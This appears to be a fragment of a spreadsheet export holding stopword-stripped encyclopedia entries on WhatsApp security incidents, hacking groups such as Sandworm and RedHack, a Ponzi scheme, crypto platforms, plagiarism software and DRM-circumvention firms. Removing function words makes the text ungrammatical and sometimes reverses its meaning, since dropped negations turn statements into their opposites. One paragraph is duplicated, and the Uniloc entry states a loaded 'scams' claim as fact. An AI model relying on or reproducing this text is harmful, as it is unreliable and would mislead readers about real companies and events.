2017, research team ruhr university bochum published security analysis group messaging protocols whatsapp messaging services, found privacy concern whatsapp's servers effectively control membership groups. report found would therefore possible arbitrary phone numbers group chat future communication becomes insecure.in october 2017, german software company open-xchange criticized whatsapp, among others, using proprietary software stated plans create open-source alternative. guardian incident january 2017, guardian reported security researcher tobias boelter found whatsapp's policy forcing re-encryption initially undelivered messages, without informing recipient, constitute loophole whereby whatsapp could disclose content messages.whatsapp open whisper systems officials disagreed assessment.after complaints security researchers, guardian substantially revised corrected articles, follow article boelter removed. june 2017, guardian readers’ editor paul chadwick wrote "the guardian wrong report january popular messaging service whatsapp security flaw serious huge threat freedom speech." detailed review found misinterpretations, mistakes misunderstandings happened several stages reporting editing process. cumulatively produced article overstated case." chadwick also noted since guardian article, whatsapp "better secured introduction optional two-factor verification february." 2019 2019, revealed security vulnerability whatsapp, allowing remote person install spyware making call even need answered. later, june 2019, another vulnerability revealed, allowing user transform audio call video call, without victim consent without victim noticing. bounty us$5000 offered bug.in december 2019, whatsapp confirmed security flaw would allow hackers malicious image file gain access recipient's data. flaw first reported user named awakened github explanation exploit worked. when recipient opened gallery within whatsapp, even sending malicious image, hack triggered device contents become vulnerable. flaw patched users encouraged update whatsapp.in june 2019, whatsapp announced would take legal action users send disproportionately high number messages using communication platform. company reiterated platform meant private messaging businesses interact customers business app. notification website company stated "beginning december 2019, whatsapp take legal action determine engaged assisting others abuse violates terms service, automated bulk messaging".in september 2019, whatsapp criticized implementation 'delete everyone' feature. users elect save media camera roll automatically. when user deletes media everyone, whatsapp delete images saved camera roll users able keep images. whatsapp released statement saying "the feature working properly," images stored camera roll cannot deleted apple's security layers.in december 2019, whatsapp confirmed security flaw would allow hackers malicious image file gain access recipient's data. when recipient opened gallery within whatsapp, even sending malicious image, hack triggered device contents become vulnerable. flaw patched users encouraged update whatsapp.in november 2019, whatsapp released privacy feature users decide adds group.on december 2019, whatsapp fixed security flaw allowed cyber attackers repeatedly crash messaging application members group chat, could fixed forcing complete uninstall reinstall app. discovered check point august 2019 reported whatsapp. fixed version 2.19.246 onwards. 2020 april 2020, whatsapp sued group allegedly using spyware produces hack least 1,400 whatsapp users. company responded claiming responsible for, control clients software. according research citizen countries used software hack whatsapp include, saudi arabia, bahrain, kazakhstan, morocco, mexico united arab emirates.on december 2020, part anti-trust case google, complaint made whatsapp gave google access private messages. complaint heavily redacted part ongoing case, therefore cannot determined claim alleges tampering app's end-to-end encryption, google accessing user backups. 2021 january 2021, whatsapp announced update privacy policy states whatsapp would collect metadata users share facebook "family companies" starting february 2021. previously, users could opt-out data sharing, longer option. policy fully apply within order comply gdpr. policy allow whatsapp send messages, still end-to-end encrypted, allow facebook data phone operating system user has, user's time zone, address, profile picture, status, phone number, usage, contacts stored whatsapp.this move drawn intense criticism facebook whatsapp, critics claiming erodes users' privacy.facing pushback lack clarity facebook data sharing, whatsapp postponed implementation updated privacy policy february 2021, 2021, announced plans limit functionality approve terms give persistent reminders propublica investigation september 2021, propublica published extensive investigation whatsapp's outside contractors artificial intelligence systems examine user communication, collaboration enforcement. investigation includes information complaint filed whistleblower u.s. securities exchange commission. internal whatsapp company documents revealed facebook's considerable efforts brand whatsapp paragon privacy". whatsapp employs around 1000 contractors 30s, accenture, offices austin, texas, dublin singapore. their review content reported whatsapp users, starts $16.50/hour. when user flags message they've received, previous four messages decrypted sent content review team. reviewer less minute decide whether nothing, place user watch list, them. pranks, ambiguous content, language nuances translation errors, process prone misunderstandings. whatsapp also uses artificial intelligence systems scan unencrypted data collected users (profile image status; phone number, imei names images user's whatsapp groups; list user's electronic devices; facebook instgram accounts) compares suspicious patterns terms images previously deemed abusive. whatsapp shares message metadata enforcement agencies department justice. legally required, discretion (such investigating facebook leaks), provide critical location account information, real-time data recipients messaged target subject. whatsapp message metadata used help jail people whistleblower natalie edwards. 2020, whatsapp reported 400,000 instances possible child-exploitation imagery national center missing exploited children. references 2020</t>
  </si>
  <si>
    <t>Reclaim The Records</t>
  </si>
  <si>
    <t>reclaim records non-profit organization activist group advocates greater transparency accessibility genealogical, archival, vital records united states. they state freedom information requests lawsuits force government agencies, archives, libraries provide copies previously inaccessible records public. reclaim records digitizes publishes records online free public use, without copyrights usage restrictions.reclaim records first genealogical organization successfully government agency release records back public. july 2019, organization acquired freely published twenty five million records, never open public location format, else available outdated formats microfiche limited locations never gone online before. history reclaim records founded brooke schreier ganz, technologist long-time amateur genealogist. while living california, ganz become increasingly frustrated lack online access york city york state archival records. almost none york records online respective city state government archives agencies, records available search view genealogy websites, whether for-profit non-profit. small subset basic vital records index data available public, physically onsite york records repositories, outdated formats microfilm microfiche. after unsuccessfully attempting york city's open data law, local 2012, compel publication basic indices records, ganz decided state's freedom information (foil) force release copies. made foil request york city municipal archives january 2015, initially agreed denied city. this article lawsuit supreme court york august. wanting city name case, ganz created reclaim records organization could listed petitioner case. city settled case five days court, ganz first public copies index york city marriage licenses 1908–1929 rolls microfilm. this first time american genealogist ever successfully sued return genealogical records public. case proved municipal archives' holding indeed subject york's foil. january 2016, reclaim records filed another foil request became another article lawsuit, time filed york city clerk's office. they settled group, providing reels microfilm copies digital database created in-house use. city also paid organization's attorneys fees. november 2016, reclaim records filed third lawsuit missouri sunshine missouri department health senior services access basic index births deaths state. during course lawsuit, discovered missouri dhss selling data researchers years, unwilling provide copies public. case still pending.reclaim records formally incorporated december 2016 granted 501(c)(3) non-profit status february 2017. notable legal cases awards *awarded missouri department health senior services, information uncovered reclaim records' sunshine requests subsequent lawsuit agency also freedom information information activism muckrock open data references external links official website</t>
  </si>
  <si>
    <t>Sandworm (hacker group)</t>
  </si>
  <si>
    <t>sandworm also known unit 74455, allegedly russian cybermilitary unit gru, organization charge russian military intelligence. other names, given cybersecurity researchers, include telebots, voodoo bear, iron viking.the team believed behind december 2015 ukraine power grid cyberattack, 2017 cyberattacks ukraine using notpetya malware, various interference efforts 2017 french presidential election, cyberattack 2018 winter olympics opening ceremony. then-united states attorney western district pennsylvania scott brady described group's cyber campaign "representing destructive costly cyber-attacks history."on october 2020 us-based grand jury released indictment charging alleged unit 74455 officers cybercrimes. officers, yuriy sergeyevich andrienko (юрий сергеевич андриенко), sergey vladimirovich detistov (сергей владимирович детистов), pavel valeryevich frolov (павел валерьевич фролов), anatoliy sergeyevich kovalev (анатолий сергеевич ковалев), artem valeryevich ochichenko (артем валерьевич очиченко), petr nikolayevich pliskin (петр николаевич плискин), individually charged conspiracy conduct computer fraud abuse, conspiracy commit wire fraud, wire fraud, damaging protected computers, aggravated identity theft. five accused overtly developing hacking tools, ochichenko accused participating spearphishing attacks 2018 winter olympics conducting technical reconnaissance attempting hack official domain parliament georgia.in february 2022, sandworm allegedly released cyclops blink malware. malware similar vpnfilter. malware allows botnet constructed, affects asus routers watchguard firebox appliances. cisa issued warning malware.in late march 2022, human rights investigators lawyers berkeley school sent formal request prosecutor international criminal court hague. they urged international criminal court consider crimes charges russian hackers cyberattacks ukraine. sandworm specifically named relation december 2015 attacks electrical utilities western ukraine 2016 attacks utilities kyiv 2016.in april 2022, sandworm attempted blackout ukraine. said first attack five years industroyer malware variant called industroyer2. also cyberwarfare russia blackenergy fancy bear references external links justice department indictment</t>
  </si>
  <si>
    <t>Stock Generation</t>
  </si>
  <si>
    <t>stock generation (sg) ponzi scheme operated ltd. operated internet 1998 early 2000. stock generation allowed people trade "virtual companies" using real money promised unsustainably high returns investment. history website established january 1998 dominica using gambling license issued caribbean country, u.s. securities exchange commission initially unable cite stock generation's founders owners (members russian conglomerate mmm) securities violations. late 1999, participants began experience difficulties redeeming virtual shares. finally, 2000, market "crashed". march 2000, took website pretext server maintenance unilaterally suspending pending requests withdraw funds sharply reducing participants' account balances companies except privileged company invoking game's rule weeks later, peremptorily announced reverse stock split highest-yield company, applying caveat definition companies defined rule 26.6) caused share prices plummet less 1/10,000 previous values, shares (including "guaranteed" decrease value) devalued 95%. time, stopped responding participant requests return funds, continued solicit participants website. may, stock generation began banning players started question legitimacy forums.the sued u.s. district court district massachusetts, alleging "virtual stock exchange" effect ponzi scheme. court initially ruled favor stock generation, stating site adequately described market game", investment vehicle. united states court appeals first circuit later reversed district court, stating "the opportunity invest shares privileged company, described sg's website, constituted invitation enter investment contract within jurisdictional reach federal securities laws." game shut around june 2000, home page continued running autumn year, although none links worked time; briefly reopened early 2001 following massachusetts court ruling, announcing game would return point (were first circuit decision). operation stock generation's website traded shares "virtual" companies. each companies name logo, often referred number listed. companies traded purely "gambling" purposes, shares could randomly. having companies "trading" website allowed stock generation claim enterprise online gambling venture, rather actual stock market investment-related business, rules would apply. company named golden nuggets, "privileged" company, shares "guaranteed" never decrease value. promised return originally month (215% annually), later reduced month (125% annually). early april 2000, stock generation, despite previous guarantees, devalued privileged company shares previous value. companies named megabyte fountain youth respectively, promised monthly returns 100% (later 70%) respectively. time, share prices could plummet company 100% (e.g. company that caveat, defined basic rules game pertaining companies (rule 26.6), another stock generation justify claims gambling website, rather investment vehicle. stock generation reluctant invoke rule 26.6's devaluation clause throughout time game active. instead chose apply another rule (known rule permitted stock generation reduce individual account balances recalculating funds originally invested "privileged" company instance, user chose invest sign-up bonus company 11's shares, kept funds year sought withdraw once, could balance going $204,800 (100% monthly rate, compounded twice week) $157 (10% monthly rate compounded twice week) transaction history would state invested funds company shares rather company rule allowed stock generation avoid massive five figure withdrawals, thus allowing system last years, share prices increasing 10,000-fold opposed stock generation's predecessor, lasted months, stock price increasing "only" 127-fold). judging complaints bulletin board, application rule become widespread early 2000, demands withdrawals increased. march 2000, rule applied every account.the devaluation clause rule 26.6 applied weeks later, first time since game launched. value company 10's share half. company shares underwent 1-for-10,000 reverse split, actual share price plummeting less 1/100,000th value (from share $0.10 "new" share, worth 10,000 ones). day, stock generation reduced price company shares $16.90 $0.84 clear violation rules shares guaranteed never decrease value. point, stock generation's users began reporting game dominican authorities sec; return, site's administrators began banning players criticized finance forums delphi.stock generation continued operate several weeks that, offering returns 150% month, legal troubles website halted june 2000. legal opinion description quotation public information united states court appeals first circuit, decided al., f.3d (1st circuit 2001): "stockgeneration" website offering on-line denizens opportunity purchase shares eleven different "virtual companies" listed website's "virtual stock exchange." arbitrarily purchase sale prices imaginary companies biweekly "rounds," guaranteed investors could sell quantity shares posted prices. placed upper limit amount funds investor could squirrel away virtual offerings. sec's complaint focused shares particular virtual enterprise referred "privileged company". advised potential purchasers "particular attention" shares privileged company boasted investing shares "game without risk." end, website announced privileged company's shares would unfailingly appreciate, boldly proclaiming "[t]he share price [the privileged company] supported owners value constantly rises; average rate monthly (this approximately 215% annually)." plausibility representation allay anxiety future pricing, published prices privileged company's shares month advance. while conceded decline share price theoretically possible, assured prospective participants "under rules governing fall prices, [the share price privileged company] cannot fall round." bolster claim, vouchsafed shares privileged company supported several distinct revenue streams. according sg's representations, capital inflow participants provided liquidity existing participants might choose sell virtual shareholdings. backstop, pledged allocate indeterminate portion profits derived website operations special reserve fund designed maintain price privileged company's shares. asserted profits emanated four sources: collection 1.5% commission transaction conducted virtual stock exchange; bid-ask spread virtual shares; "skillful manipulation" share prices eight particular imaginary companies, including privileged company, listed virtual stock exchange; sg's right sell shares three virtual companies (including privileged company). hedge adversity, alluded availability auxiliary stabilization funds could tapped ensure continued operation virtual stock exchange. sg's website contained lists purported "big winners," internet bulletin board featuring testimonials supposedly satisfied participants, descriptions incentive programs held prospect rewards activities referral participants (e.g., sg's representation would "20, referred player's highest first three payments") establishment affiliate websites. least united states domiciliaries, paying real cash, purchased virtual shares virtual companies listed defendants' virtual stock exchange. notes references</t>
  </si>
  <si>
    <t>Unit 180</t>
  </si>
  <si>
    <t>unit 180(180부대) north korean cyberwarfare cell, component reconnaissance general bureau.kim heung-kwang, former computer science professor north korea, stated unit likely involved illicit operations obtain cash regime, counterattack bangladesh bank wannacry ransomware attack. references</t>
  </si>
  <si>
    <t>Stellar (payment network)</t>
  </si>
  <si>
    <t>stellar, stellar lumens, open source, decentralized protocol digital currency fiat money low-cost transfers allows cross-border transactions pair currencies. stellar protocol supported delaware nonprofit corporation, stellar development foundation, though organization enjoy 501(c)(3) tax-exempt status irs. history 2014, mccaleb, founder co-founder ripple, launched network system stellar former lawyer joyce kim. before official launch, mccaleb formed website called "secret bitcoin project" seeking alpha testers. nonprofit stellar development foundation created collaboration stripe patrick collison project officially launched july. stellar received million seed funding stripe. stellar released decentralized payment network protocol native currency, stellar. launch, network billion stellars. percent would given non-profits working toward financial inclusion. stripe received percent billion initial stellar return seed investment. cryptocurrency, originally known stellar, later called lumens xlm. august 2014, mercado bitcoin, first brazilian bitcoin exchange, announced would using stellar network. january 2015, stellar approximately million registered user accounts platform market almost million.the stellar development foundation released upgraded protocol consensus algorithm april 2015 went live november 2015. algorithm used scp, cryptocurrency protocol created stanford professor david mazières.lightyear.io, for-profit entity stellar, launched 2017 commercial company. september 2017, stellar announced benefits program, part stellar partnership grant program, would award partners million worth lumens project development. september 2018, lightyear corporation acquired chain, combined company named interstellar. usage 2015, announced stellar releasing integration vumi, open-sourced messaging platform praekelt foundation south africa. vumi uses cellphone talk time currency using stellar protocol. stellar partnered cloud-based banking software company oradian april 2015 integrate stellar oradian's banking platform microfinance institutions (mfis) nigeria.deloitte announced integration stellar 2016 build cross-border payments application, deloitte digital bank. december 2016, announced stellar's payment network expanded include coins.ph, mobile payments startup philippines, icici bank india, african mobile payments firm flutterwave, french remittances company tempo money transfer.in october 2017, stellar partnered klickex facilitate cross-border transactions south pacific region. cross-border payment system developed includes partnerships banks area. lumens digital currency ranked 13th market capitalization time partnership.in december 2017, techcrunch announced stellar's partnership sureremit, nigerian-based non-cash remittances platform.on january 2021, ministry digital transformation ukraine announced cooperation partnership stellar development ukraine digital infrastructure, stellar value increased 40%. ecosystem stellar active community ecosystem supports projects utilize stellar network stellar community fund. overview stellar open-source protocol exchanging money tokens using stellar consensus protocol. platform's source code hosted github. servers software implementation protocol, internet connect communicate stellar servers. each server stores ledger accounts network. nodes operated stellar development foundation, conjunction organizations, providing total validator nodes. transactions among accounts occur mining rather consensus process among accounts quorum slice. current network stroops, equivalent 0.00001 xlm. also blockchain-based remittances companies references external links official website</t>
  </si>
  <si>
    <t>Uniswap</t>
  </si>
  <si>
    <t>uniswap cryptocurrency exchange uses decentralized network protocol. uniswap also name company initially built uniswap protocol. protocol facilitates automated transactions cryptocurrency tokens ethereum blockchain smart contracts. october 2020, uniswap estimated largest decentralized exchange fourth-largest cryptocurrency exchange overall daily trading volume. history uniswap created november 2018 hayden adams, former mechanical engineer siemens.the uniswap company received investments venture capital firms, including andreessen horowitz, paradigm venture capital, union square ventures parafi. uniswap’s average daily trading volume us$220 million october 2020. traders investors utilized uniswap usage decentralized finance (defi).the first version (v1) uniswap protocol published november 2018 proof-of-concept amms (automated market makers). version launched 2020, version launched 2021, introducing options allocate liquidity within certain price range. overview uniswap decentralized finance protocol used exchange cryptocurrencies tokens; provided blockchain networks open-source software. this contrast cryptocurrency exchanges centralized companies. changes protocol voted owners native cryptocurrency governance token called uni, implemented team developers. coins initially distributed early users protocol. each ethereum address interacted uniswap prior september 2020 received ability claim tokens (worth approximately $1,400 time). market capitalization token billion february 2022. protocol contrast centralized exchanges, uniswap uses liquidity pools rather serving market maker, create efficient markets. individuals bots—termed "liquidity providers"—provide liquidity exchange adding pair tokens smart contract bought sold users. return, liquidity providers given percentage trading fees earned trading pair. trade, certain amount tokens removed pool amount token, thereby changing price. fees required list tokens allow large amount ethereum tokens accessible registration required users. open-source software, uniswap's code also forked create exchanges. references</t>
  </si>
  <si>
    <t>Red Condor</t>
  </si>
  <si>
    <t>condor, inc. privately held company offers anti-spam appliances hosted service block e-mail spam, spyware, viruses. company also offers message archiving service provides back-up inbound outbound email messages. 2007, condor introduced technology, integrates local appliance hosted service. technology redirects email appliance hosted service event network failure. november 2008, company named thomas steding, former corporation, president ceo. january 2009, condor received technology year award infoworld magazine. april 2010, condor purchased bernard software. products message assurance gateway appliances message assurance gateway hosted service condor archive references external links edgewave home page condor threat center</t>
  </si>
  <si>
    <t>Red Hacker Alliance</t>
  </si>
  <si>
    <t>hacker alliance (中国红客联盟) informal group chinese hackers time 80,000 members, making largest hacking groups world. december 2004, group took website became inactive march 2005, regrouped relaunched site. computer world australia informationweek reported members hacker alliance involved planned ddos attack cnn.com april 2008. reported took preventive measures news broke impending attack. also ghostnet honker union redhack (from turkey) references</t>
  </si>
  <si>
    <t>Unicheck</t>
  </si>
  <si>
    <t>unicheck (previously known unplag) cloud-based plagiarism detection software finds similarities, citations references texts. unicheck primarily used k-12 higher education, utilised institutions worldwide. tool also used stand-alone checker individual users like writers, editors, bloggers lawyers. history unicheck produced launched company phase karma 2014 name unplag. 2016 unicheck partnered xсulture project became certified partner canvas learning management system instructure 2017 gained status canvas alliance partner). summer 2017, unicheck became first plagiarism checker integrate google classroom. also released type integration canvas, called “native” based api. after january 2018 unicheck released add-on google docs.in 2020 unicheck created phase karma acquired turnitin. unicheck continue operate separate plagiarism service. functionality unicheck offers search recognition functionality similarities, citations, references texts. also discover characters replaced text another alphabet example, similar characters cyrillic latin alphabets. find similarities paraphrases, checks performed internet (web pages indexed yahoo google), open source repositories, user's internal library database. check results presented similarity report, similarities found link source. these reports downloaded documents. unicheck used stand-alone online tool, integrated (learning management system) plugin, lti, lti+api types integrations. unicheck compatible following file formats: .doc, .docx, .rtf, .txt, .odt, .ppt, .pptx, .html, .pdf, .pages, .gdoc, well archives, files uploaded google drive, onedrive dropbox. unicheck allows users store documents internal library. global settings allow adjustment check sensitivity enable users choose whether want share checked documents unicheck's database. each newly signed user receives trial pages. technology unicheck uses algorithm searches similar text pages, open source repositories, user's internal library. accuracy search achieved using algorithm divides text small shifting sequences uses look similarities using live index, enables checks pages.the technology developed computer science engineers professors. 2017, technology improved adding natural language processing (nlp) principles. this enabled system recognise synonyms find paraphrased content checked text. algorithm compared latent semantic indexing, method used google determine connections words phrases.the technology recognise citations references text, given properly formatted according academic styles. currently, technology recognizes apa, mla, chicago, turabian, harvard styles. speed checks page seconds. also comparison anti-plagiarism software educational technology references external links unicheck official website unicheck blog</t>
  </si>
  <si>
    <t>Uniloc</t>
  </si>
  <si>
    <t>uniloc corporation patent troll company founded australia 1992 scams google play developers millions dollars using vague claims. history uniloc technology based patent granted inventor richardson also founder uniloc company. original patent application dated late 1992 australia granted 1996 covers technology popularly known product activation, software machine locking. 1993 uniloc distributed "try buy" versions software multiple publishers marketing agreement ibm. initial success sale thousands copies software package (first aid, developed cybermedia) distributed front cover windows sources magazine 1994. 1997 subsidiary called uniloc preload produce preloaded unlockable editions popular software products pcs. distribution agreements executed emachines toshiba. family magazine also produced months magazines featuring unlockable software uniloc preload cover 2000.in 2003, uniloc corporation subsidiary called uniloc usa, operates rhode island southern california. company currently licensing patented technology software publishers entertainment companies including sega. patent lawsuits 2010, uniloc sued companies alleges violated copy-protection patents. according uniloc, companies settled court. abstract nature patents, litigious activities, uniloc deemed "patent troll" critics. microsoft uniloc sued microsoft 2003 violating patent relating technology designed deter software piracy. 2006, district judge william smith ruled favour microsoft, appeals court overturned decision, saying "genuine issue material fact" ruled case without hearing jury. april 2009 rhode island jury found microsoft violated patent told microsoft uniloc $388 million damages. after success, uniloc filed patent infringement suits sony america, mcafee, activision, quark, borland software aspyr media.the decision microsoft subsequently overturned september 2009, judge smith vacated jury's verdict ruled favour microsoft again, saying jury "lacked grasp issues reached finding without legally sufficient basis". uniloc appealed judge's decision, alleging bias 2011 jury verdict reinstated microsoft. court appeals federal circuit said instead using usual percent rule", damage awards infringement would need recalculated.in march 2012, uniloc microsoft reached "final mutually agreeable resolution", terms disclosed. minecraft july 2012, uniloc filed lawsuit mojang, citing minecraft pocket edition, infringement upon patents claiming exclusive rights method software license checking. markus persson mojang stated believe minecraft infringes uniloc patent 6,857,067 mojang defend lawsuit. lawsuit also filed android game developers including electronic arts (maker bejeweled laminar research (maker x-plane), distinctive developments, gameloft, halfbrick studios, madfinger games square enix. patent involved dispute invalidated march 2016. references external links official website patent 5,490,216</t>
  </si>
  <si>
    <t>RedHack</t>
  </si>
  <si>
    <t>redhack turkish marxist-leninist computer hacker group founded 1997. group claimed responsibility hacking websites institutions include council higher education, turkish police forces, turkish army, türk telekom, national intelligence organization others. group's core membership said twelve. redhack first hacker group accused terrorist organization currently world's wanted hacker groups. pre-2012 2010: hacking international system india police department traffic services erasing fines. 2000: hacking decoding cctv system. july 2010: memory sivas massacre group hacked defaced government hundreds dissident websites, ministry interior also affected websites. july 2011: hacking defacing 1000 websites, among websites adnan oktar dissident websites memory sivas massacre. 2012 february 2012: after taking police websites, group leaked internal data. march 2012: record numbers, names, email addresses passwords belonging staffers turkey’s national police published online group. group commented also held grudge ankara police brutality tekel workers arbitrary blacklisting citizens. everyone forget, communists not." april 2012: subpage ministry interior turkey defaced. april 2012: result ddos attack turkish ttnet internet slows down. spokesman presidency telecommunication communication confirmed attack, denied damage infrastructure. 2012: with hacking system land force command, group leaked information personnel turkish armed forces. 2012: reaction poisoning pupil started project ministry education, group hacked websites responsible supplying milk companies. 2012: mother's group hacked defaced website ministry family affairs left message criticized level women rights turkey. 2012: support strike group took website turkish airlines. current minister ministry transport, maritime communication binali yıldırım confirmed attack denied damage. july 2012: group targeted file sharing system ministry foreign affairs, disclosed foreign diplomats. worth mentioning group also able steal gigabyte internal files, leaked far. july 2012: reaction threats journalists academics supported redhack, group leaked megabyte-big text file stolen february 2012 internal system ankara security directorate revealed identities turkish police informants. october 2012: with hacking defacing website presidency religious affairs, group left message criticize government fethullah gülen. october 2012: with hacking website public procurement authority, released website sell justice development party cent. december 2012: hacking system ministry finance, group announced increasing raise officers. december 2012: with "help" group government able arrest pedophilia, also twitter accounts suspended. 2013 january 2013: with hacking council higher education second time, group stole 60.000 files. with start leaking files group proofed cases corruption various educational institutions, including istanbul university, uludağ university bursa, marmara university, çukurova university many universities around turkey. just days breach, council higher education denied part cyber attack test presidency telecommunication communication. february 2013: group leaked files mayor ankara metropolitan melih gökçek. this included personal information well assets. march 2013: support redhack anonymous took website ankara metropolitan municipality. march 2013: cooperation anonymous group able take mossad website. 2013: reaction istanbul governorship's brutal actions protesters turkey, group defaced website istanbul governorship left message governor vali mutlu. 2013: reaction bombings reyhanlı, hatay, group took hatay governor mourning. 2013: group published documents attack, claimed belong gendarmerie intelligence department. documents indicate bombing planned al-qaeda related rebel groups syria, contrary government's claims. vice president hüseyin çelik stated documents obtained hacking leaked, content related reyhanlı bombings another unrelated one, precautions made. private utku kali arrested, charged leaking documents. redhack denied involvement kali. kali released november. 2013: mail correspondence current minister affairs egemen bağış leaked. june 2013: order protest silence turkish mps, group leaked telephone numbers spouses blog. this start long history hacks banner #opturkey, collaboration anonymous redhack. june 2013: protest police brutality regarding protesters, group leaked telephone numbers provincial police chiefs istanbul. leak contained also internal message police officers responsible save every intervention digital camera. june 2013: reaction death ethem sarisülük shot police officer, redhack took website ankara police department. june 2013: group leaked audio contained meeting minister agriculture businessmen. june 2013: group hacked istanbul special provincial administration, leaked user information called followers feel free change things. july 2013: group hacked successfully took website sivas special provincial administration commemorate sivas massacre. july 2013: group hacked presidency religious affairs, leaked user information called followers twitter fell free change things. august 2013: group hacked adana metropolitan municipality water sewerage authority, leaked user information called followers feel free change things. august 2013: hacking website union municipalities turkey leaking usernames passwords. attack dedicated gezi protest victims i̇smail korkmaz utku kali, mind leaked documents regarding reyhanli bombings member group. september 2013: group took website turkish national police remind enforcement victims gezi protest dilan alp, seriously injured police istanbul. september 2013: releasing documents name police officers killed turkish protester abdullah cömert, victims police brutality gezi protest. leak contained names police officers, location, dates time. october 2013: group hacked defaced website turkey union public enterprises. october 2013: group released documents related turkey’s former minister affairs egemen bağış network. besides bağış' income, communications foreign officials, daily activities, official meetings documents also exposed misusing authority. november 2013: while people behind bars accused members group, redhack hacked left message website grand national assembly turkey. december 2013: response repeated arrest taylan, redhack breached defaced website justice development party ordu. 2014 january 2014: group hacked website grand national assembly turkey left message "redhack, hack public." group also leaked phone numbers turkcell employees response changing phone numbers high ranked government officials leaked hours ago. january 2014: group exploited cross-site scripting vulnerability parliament’s website send message government, breached website turkish state railways leaked several files allegedly stolen organization’s systems, leaked usernames clear text passwords turkish contractors association. group also able infiltrate email systems izmir headquarters leaked emails represented acts corruption. january 2014: response inaction central bank group took website central bank turkey. february 2014: group breached systems three major telecoms companies, ttnet, turkcell, vodafone. leaked data included names, dates birth, phone numbers, voicemail delivery details. addresses published matter principle. especially data vodafone showed company logging voicemails. february 2014: leaking phone numbers justice development party. february 2014: leaking phone numbers police officers. february 2014: response internet group leaked phone numbers police officers. then defaced official website kars municipality left message protest internet law. website distribution authority sakarya also hacked comment "gas free corrupt government stealing enough people".the third target website city amasya, group leaked justice development party's membership applications. also ministry education also attacked, voices expenditures schools published online justpaste.it february 2014: group leaked contact information staff members embassy turkey. leak contained list names, email addresses, titles phone numbers. dedicated sinan cemgil, founders turkish people’s liberation army. march 2014: response decision youtube twitter turkey, group took website presidency telecommunication communication turkey. april 2014: reaction controversial e-ticketing system soccer games, group hacked also took website aktif bank. 2014: redhack breached official website turkish cooperation coordination agency, organization operating prime ministry republic turkey leaked usernames clear-text passwords belonging site’s users. hackers told techworm attack dedicated i̇brahim kaypakkaya, major leader communist movement turkey. 2014: hijacking email account manisa muzaffer yurttaş justice development party leaking internal chats regarding soma mine disaster, showed high percentage carbon monoxide cause deaths, also claims dynamite usage came light. 2014: hacking email account, leaking chats, hijacking twitter facebook account prime minister's chiefadvisor mustafa varank. group shared comment twitter "the prime minister chiefadvisor graduated computer science united states america hacked. come consult now!" june 2014: early morning group successfully hacked defaced website ankara chamber industry (aso) left message nuclear power summit. group also able hack relink website trabzon provincial special administration pastehtml script. june 2014: later website tunceli governor's office sodes project coordination centre hacked message left calling government punish pedophiles, example rape mentioned group accused government ruling party concealing rape. june 2014: breached email account izzet artunç, head turkish mechanical chemical industry company. arrests march 2012: seven people arrested result operation ankara chief public prosecutor special authority redhack. group claimed statement arrested ties group.on july 2012: public prosecutor made application evaluate redhack "armed separatist terrorist organization".on october 2012: application july accepted public prosecutor requested penalty years alleged members. there still students detention four seven arrested people released. case postponed november 2012.on november 2012: three students accused member group released. court postponed case february 2013.on february 2013: court decided postpone case june 2013. reason chief justice still searching "experts needed part case".on 2013: ankara deputy attorney general stated anti-terrorism actions redhack "did involve violence" lack jurisdiction attorney general passed case cyber crimes investigation unit.on 2013: after group's leaking classified documents proved turkish government's carelessness reyhanli bombings may, private utku kali, serving time amasya commands, arrested. after kali denied member hacktivist group leaking documents, released. also 2013 protests turkey cyberwarfare electronic civil disobedience honker union hacker, guest (chinese group) leaderless resistance lulzraft lulzsec operation anti-security pentagon papers pirate party securax wikileaks references</t>
  </si>
  <si>
    <t>StegoShare</t>
  </si>
  <si>
    <t>stegoshare steganography tool allows embedding large files multiple images. used anonymous file sharing. features supports various image formats (png, jpg, bmp, gif, tiff etc.) maximal supported hidden file's size 2gb, number cover images 65536 average capacity file could embedded 250mb image) 128-bit encryption good output images quality (changes undetectable human eye) file sharing networks this software easily used anonymous file sharing. uploader downloads legal images public photo hosting site, embeds censored file images. uploader uploads pictures public photo torrent tracker puts links referencing stego pictures censored file's description forum blog. downloaders, seeders, public photo trackers, caught distributing illegal files, protected legal prosecution, always plausible deniability, saying knew nothing illicit file images. this impossible prove otherwise, human cannot differentiate ordinary image picture hidden embedded file. vulnerabilities cover file manipulation algorithm used based fixed location insertion, making output images detectable steganalysis software simply histogram characteristic function. also steganography anonymous plausible deniability references external links stegoshare website detailed technical legal help</t>
  </si>
  <si>
    <t>RedFox</t>
  </si>
  <si>
    <t>redfox (formerly slysoft) software development company based belize. company prominently known software anydvd, used bypass copy protection measures optical media, including blu-ray disc media, well clonecd, used back contents optical discs. company formerly operated john's, antigua barbuda-based slysoft. point february 2016, slysoft shut down, home page replaced message citing "recent regulatory requirements". around february 2016, aacs requested office united states trade representative place antigua barbuda priority watch list countries fail prevent intellectual property violations, specific reference slysoft. however, company's online forum remained online, replaced brand slysoft "redfox". slysoft developers also revealed none company's staff actually based antigua, company involved legal settlements aacs staff members still access slysoft's technical infrastructure—including build systems licensing servers—feasibly allowing development anydvd continue.on march 2016, slysoft reformed redfox, top-level domain based belize, released version anydvd. products anydvd remove/disable restrictions user prohibited operations films, structure protections mastering errors anydvd remove drm, lock-outs, uops films additionally high definition media, specifically blu-ray disc anystream download remove streaming video amazon prime video, disney+, max, hulu (usa) netflix clonecd copy optical discs format clonedvd mobile convert files mobile video players like ipod playstation portable game jackal create profiles disc required starting game game jackal enterprise extended version game jackal additional features automatic distribution game profiles client machinessome products supported elaborate bytes clone virtual clonedrive. aacs slysoft first offer aacs circumvention worked disc available; previous programs cracked "compatible" discs using database known keys. november 2007, slysoft claimed completely cracked bd+. however, turned incorrect, subsequent versions security code caused slysoft re-design software. march 2008, slysoft updated anydvd allowing full decryption bd+, allowing viewing film also playing copying disks third-party software. third iteration released november 2008, announced cracked slysoft release anydvd 6.5.0.2 december 2008. fourth version security code discovered movie australia february 2009, thwarting effectiveness slysoft's software.however, march 2009, slysoft updated anydvd version 6.5.3.1 allowed decryption version used australia. licensing december 2008 slysoft announced would first time begin charging customers updates software.in november 2010, slysoft initially announced discontinuation lifetime licensing option beginning january 2011. e-mail announcing change ahead time sent registered customers allowing everyone chance purchase lifetime option "while still possible;" notice posted official forums. january 2011, announcements regarding change deleted without comment structured licensing plan place; including lifetime licensing option highest priced tier. slysoft able balance internal cost matter licensing strategy allow continuation "lifetime" license option. 'update service' allow updates valid license users warned attempt install update beyond license expiry date. user cancels update current paid-up license continue work. user continues "renewal" required. following collapse slysoft, holders slysoft anydvd/anydvd lifetime license required purchase license redfox software beginning version 8.0.2.0. version 7.6.9.5 able 